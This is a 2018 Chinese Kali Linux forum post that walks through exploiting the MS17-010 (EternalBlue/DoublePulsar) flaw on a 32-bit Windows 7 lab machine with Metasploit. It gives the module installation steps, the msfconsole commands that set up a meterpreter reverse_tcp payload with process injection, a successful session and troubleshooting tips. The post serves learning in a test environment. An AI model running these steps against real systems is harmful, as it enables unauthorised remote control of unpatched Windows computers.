Kali 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 2229|回复: 1

[分享] MSFCONSOLE 利用MS17-010漏洞发起对32位机器的攻击

[复制链接]
发表于 2018-5-19 11:36:53 | 显示全部楼层 |阅读模式
PS:小白初学kali,最近扫描自己测试的一台WIN7 32位机器有MS17-010漏洞,在百度查找使用方法,发现大多数都是在X64位的机器上使用,经过多篇博客的学习,成功攻入!分享出来做交流!

环境:
攻击机:kali-linux-2018.2                      IP:192.168.1.200
靶机:WIN7 X32 旗舰版 Service Pack 1  IP:192.168.1.126


一、首先使用nessus扫描漏洞(可以使用msf自带的ms17-010扫描工具)
漏洞扫描结果.png



二、开始攻击
1、进入msfconsole
root@kali:~# msfconsole
1.png

2、加载攻击模块
msf自带的攻击模块  use auxiliary/scanner/smb/smb_ms17_010  但是经过测试发现这个模块只能运用在64位架构的系统上 ,我们攻击的靶机确实32位的,所以会报错,但是msf自带是没有32位的攻击模块的,所以需要去github下载我们需要用到的模块。
下载地址:https://github.com/ElevenPaths/E ... epulsar-Metasploit/  
下载的文件夹改名为Eternalblue-Doublepulsar-metasploit 放在/root下,如果不改名在之后的攻击中将会报错!
将下载的
eternalblue_doublepulsar.rb,拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb目录中。
msf >reload_all  //更新

下载完成后加载我们的攻击模块
msf > use exploit/windows/smb/eternalblue_doublepulsar
//设置options
msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.168.1.126   //我们的靶机
rhost => 192.168.1.126
//加载payload
msf exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.168.1.200  //设置监听
lhost => 192.168.1.200
msf exploit(windows/smb/eternalblue_doublepulsar) > set processinject explorer.exe //修改注入进程
processinject => explorer.exe

//开始攻击
msf exploit(windows/smb/eternalblue_doublepulsar) > run

//成功攻入
2.png

meterpreter >
3、测试
屏幕截图  
meterpreter > screenshot
Screenshot saved to: /root/HNAdRQLd.jpeg
3.png
至此已成功获取靶机的控制权限!


三、可能会遇到的问题
1、 4.png
模块使用错误,应该使用自己下载的模块


2. 5.png
解决方案  
首先 root@kali:~# apt-get install wine32  
确保安装了wine32
打开多架构支持
root@kali:~# wine32 -h


然后 检查是否将下载的文件移到root目录下,并保证已改名







+1
2231°C
1
  • @@..
过: 他们
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

Kali linux ( 蜀ICP备10027298号-4 ) Topics |


免责声明:
Kali linux中文网所发布的一切教程文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。

GMT+8, 2018-10-15 01:31 , Processed in 0.295326 second(s), 24 queries , Gzip On.

Powered by Discuz!

© 2009-2016 CNNS

快速回复 返回顶部 返回列表